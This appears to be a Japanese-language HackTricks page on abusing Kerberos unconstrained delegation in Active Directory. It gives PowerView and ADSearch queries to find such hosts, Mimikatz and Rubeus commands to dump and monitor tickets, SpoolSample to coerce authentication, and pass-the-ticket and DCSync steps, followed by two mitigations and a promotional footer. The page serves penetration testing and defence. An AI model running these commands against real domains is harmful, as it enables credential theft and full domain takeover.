5.7 KiB
制約のない委任
これは、ドメイン管理者がドメイン内の任意のコンピュータに設定できる機能です。その後、ユーザーがコンピュータにログインするたびに、そのユーザーのTGTのコピーがDCによって提供されるTGSに送信され、LSASSのメモリに保存されます。したがって、マシンで管理者特権を持っている場合、チケットをダンプして他のマシンでユーザーをなりすますことができます。
したがって、ドメイン管理者が「制約のない委任」機能が有効になっているコンピュータにログインし、そのマシンでローカル管理者特権を持っている場合、チケットをダンプしてドメイン管理者をどこでもなりすますことができます(ドメイン特権昇格)。
この属性を持つコンピュータオブジェクトを見つけるには、userAccountControl属性がADS_UF_TRUSTED_FOR_DELEGATIONを含んでいるかどうかを確認します。これは、powerviewが行う方法です。
# 制約のないコンピュータの一覧
## Powerview
Get-NetComputer -Unconstrained # DCは常に表示されますが、特権昇格には役立ちません
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatzでチケットをエクスポート
privilege::debug
sekurlsa::tickets /export # 推奨される方法
kerberos::list /export # 別の方法
# ログインを監視して新しいチケットをエクスポート
.\Rubeus.exe monitor /targetuser:<username> /interval:10 # 新しいTGTを10秒ごとにチェック
MimikatzまたはRubeusを使用して、管理者(または被害者のユーザー)のチケットをメモリにロードし、パス・ザ・チケットを実行します。
詳細情報:https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
ired.teamのUnconstrained delegationに関する詳細情報
強制認証
攻撃者が「制約のない委任」が許可されたコンピュータを侵害できる場合、プリントサーバーを自動的にログインさせ、サーバーのメモリにTGTを保存することができます。
その後、攻撃者はパス・ザ・チケット攻撃を実行して、ユーザーのプリントサーバーコンピューターアカウントをなりすますことができます。
プリントサーバーを任意のマシンにログインさせるには、SpoolSampleを使用できます。
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
もしTGTがドメインコントローラーから来ている場合、DCSync攻撃を実行して、DCからすべてのハッシュを取得することができます。
この攻撃に関する詳細は、ired.teamを参照してください。
他の認証を強制する方法は以下の通りです:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
緩和策
- 特定のサービスに対してDA/Adminログインを制限する
- 特権アカウントに対して「アカウントは機密であり、委任できない」と設定する。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- **ハッキングのトリックを共有するには、hacktricks repoとhacktricks-cloud repo**にPRを提出してください。